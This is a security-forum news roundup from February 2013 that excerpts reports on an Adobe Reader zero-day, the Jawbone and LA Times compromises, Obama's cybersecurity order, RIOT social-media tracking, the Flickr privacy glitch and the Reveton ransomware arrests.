Spyware, viruses, & security forum: NEWS - February 13, 2013

"Adobe says it's investigating reports attacks are able to pierce a key defense."

A previously undocumented flaw in the latest version of Adobe Systems' ubiquitous Reader application is being exploited in online hacks that allow attackers to surreptitiously install malware on end-user computers, a security firm said.

"Upon successful exploitation, it will drop two DLLs," FireEye researchers Yichong Lin, Thoufique Haq, and James Bennett wrote of the online attacks they witnessed. "The first DLL shows a fake error message and opens a decoy PDF document, which is usually common in targeted attacks. The second DLL in turn drops the callback component, which talks to a remote domain." DLL is shorthand for a file that works with the Microsoft Windows dynamic link library.

Jawbone, makers of Bluetooth headsets, fitness bracelets, and neat Jambox portable speakers, has warned that hackers managed to break into its systems, and accessed the names, email addresses and encrypted passwords of users.

In an email sent to affected users, Jawbone explained that the hack affected an unspecified number of customers who had registered a MyTALK account (used to customise devices and receive firmware updates). [Screenshot]

Jawbone said it had disabled the MyTALK passwords of affected customers, and was keen to emphasise that it did not have any evidence that the hackers had abused the stolen information:

"..we do not believe there has been any unauthorized use of login information or unauthorized access to information in your account."

What remains a mystery, however, is how many Jawbone customers were impacted and just how Jawbone stored the encrypted passwords. For instance, there's no indication that the hashed passwords were salted to introduce a random factor that would make them significantly harder to crack.

US President Barack Obama has signed an executive order requiring federal agencies to share cyberthreat information with private companies and to create a cybersecurity framework focused on reducing risks to companies providing critical infrastructure

The cybersecurity framework would be voluntary for some operators of critical infrastructure, but the order also requires federal agencies overseeing critical infrastructure to identify the operators and industries most at risk and to explore whether the government can require those companies to adopt the framework.

The agencies will focus on critical infrastructure "where a cybersecurity incident could reasonably result in a catastrophic regional or national effect on public health or safety, economic security, or national security," said the order, signed by Obama just before his State of the Union speech Tuesday evening.

In a company video obtained and posted online by The London Guardian on Sunday, Mr. Urch shows how repeated "check-ins" or postings on social media sites leave a trail of location data that enables RIOT to build up a detailed daily itinerary for the people it is tracking.

He demonstrates by tracking a Raytheon employee called Nick. When he inputs Nick's email address, the program responds with a list of social media sites Nick uses. With a few clicks, Mr. Urch is able to compile location data from photographs and other postings Nick has shared on a social media, including FourSquare — a location-based service for FaceBook users that helps online friends know when they are near each other.

The Los Angeles Times has scrubbed its Web site of malicious code that served browser exploits and malware to potentially hundreds of thousands of readers over the past six weeks.

On Feb. 7, KrebsOnSecurity heard from two different readers that a subdomain of the LA Times' news site (offersanddeals.latimes.com) was silently redirecting visitors to a third-party Web site retrofitted with the Blackhole exploit kit. I promptly asked my followers on Twitter if they had seen any indications that the site was compromised, and in short order heard from Jindrich Kubec, director of threat intelligence at Czech security firm Avast.

Kubec checked Avast's telemetry with its user base, and discovered that the very same LA Times subdomain was indeed redirecting visitors to a Blackhole exploit kit, and that the data showed this had been going on since at least December 23, 2012.

Contacted via email, LA Times spokeswoman Hillary Manning initially said a small number of users trying to access a subdomain of the site were instead served a malicious script warning on Feb. 2 and 3. But Manning said this was the result of a glitch in Google's display ad exchange, not a malware attack on the company's site.

The report details mobile, social, email and web-based threats, and while it is full of ominous data points, it is a very interesting read. The report is designed to help security professionals keep current with threat trends and improve the effectiveness of existing security solutions. It can also be used to identify and prioritize security gaps that may require new approaches and more innovative strategies.

Creating the report began with the ThreatSeeker Network, composed of big data clusters used by the WSL to collect and manage up to 5 billion inputs each day from 900 million global endpoints. Malware samples, mobile applications, email content, web links and other information were then passed through deep analysis processes including our Advanced Classification Engine (ACE), which applied over 10,000 different analytics.

Here is a sampling of key findings from this year's report:

1. Web Security. The web became significantly more malicious in 2012, both as an attack vector and as the primary support element of attacks originating through social media, mobile devices, and email. Researchers measured an alarming 600 percent increase in the use of malicious web links through all vectors.

2. The Social Web. Malicious content was hidden within social media behind shortened web links 32 percent of the time. Social media attacks took advantage of the confusion of new features, changing services and unsophisticated users.

3. Mobile Security. A study of last year's malicious apps revealed how they often abuse permissions; especially in the use of SMS communications, something very few legitimate apps do. Risks also increased as mobile devices were used for social media and web surfing more often than actually making a phone call.

As recently mentioned in the Sophos Security Threat Report, 80% of the websites where we detect malicious content are innocent sites that have been hacked.

A trend that we have observed is that hackers will insert their malicious code into legitimate JavaScript (not to be mixed up with Java!) hosted on the website.

The JavaScript is automatically loaded by the HTML webpages and inherits the reputation of the main site and the legitimate JavaScript.

In other words, if a user's anti-virus software did display an alert about malicious content, it might be shrugged off as a false positive and blamed on an unreliable detection of a legitimate piece of JavaScript code.

Recently SophosLabs has seen a flurry of detections of Troj/Iframe-JG on legitimate websites, including:

A glitch in the Flickr matrix has resulted in intimate photos of a number of its users being made available for everyone to see after their permissions turned from "private" to "public" without their knowledge, reports The Verge.

The photos were accessible to the public for 20 days, and it was impossible to change the setting back to "private" during this period. The only silver lining in this incident is that these photos were not included in Flickr's own search engine or any of the outside ones.

Affected users took to the official help forum to express their dissatisfaction and anger, especially after Flickr attempted to do some damage control by setting all public photos to private.

"It has utterly decimated my food blogging site which is a huge source of revenue for me," wrote a FlickrPro user. "Not only do I have to go back and change all the permissions, BUT changing the permissions changes the code, which means I have to go through each post and re-apply all my pictures. This is HUNDREDS of pictures. I am utterly disgusted and shaking I am so angry."

Ransomware is a nasty scam that infiltrates your computer and tricks you into thinking that you've done something wrong. Police ransomware in particular informs users that they need to pay their local police a fine. [Screenshot: Ransomeware Warning Screen]

We have written detailed reports about these attacks in the past, including multiple blog posts as part of our investigations into this ongoing threat. [Screenshot]

Trend Micro threat researchers have been studying this scam throughout 2012 and have collaborated very closely with law enforcement authorities in several European countries, especially in Spain. Today, we are very happy to report that the Spanish Police has put the information to good use, and they have just announced in a press conference the arrest of one of the head members of the cybercriminal gang that produces the Ransomware strain known as REVETON.

The apparent arrest of this cybercriminal of Russian origin occured in Dubai, United Arab Emirates. The law enforcement authorities are working to extradite him to Spain for prosecution. Along with his arrest, the operation included the arrests of 10 other individuals tied to the money laundering component of the gang's operations, which managed the monetization of the PaySafeCard/UKash vouchers received as payment in the scam. The gang apparently had a branch in Spain that exchanged these vouchers and converted them into actual money, which would then be transferred to the leaders of the gang in Russia.

If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.

Track this thread and email me when there are updates.Please read before posting

If you're asking for technical help, please be sure to include all your system info, including operating system, model number, and any other specifics related to the problem. Also please exercise your best judgment when posting in the forums--revealing personal information such as your e-mail address, telephone number, and address is not recommended.

Old Thread Warning!

This thread is more than days old. It is very likely that it does not need any further discussion and replying to it will serve no purpose. However, if you feel it is necessary to make a new reply, you can still do so.

I am aware that this thread is old, but I still want to post a reply.

Checkbox must be checked in order to post in this old thread.

Sorry, there was a problem submitting your post. Please try again.

Sorry, there was a problem generating the preview. Please try again.

Duplicate posts are not allowed in the forums. Please edit your post and submit again.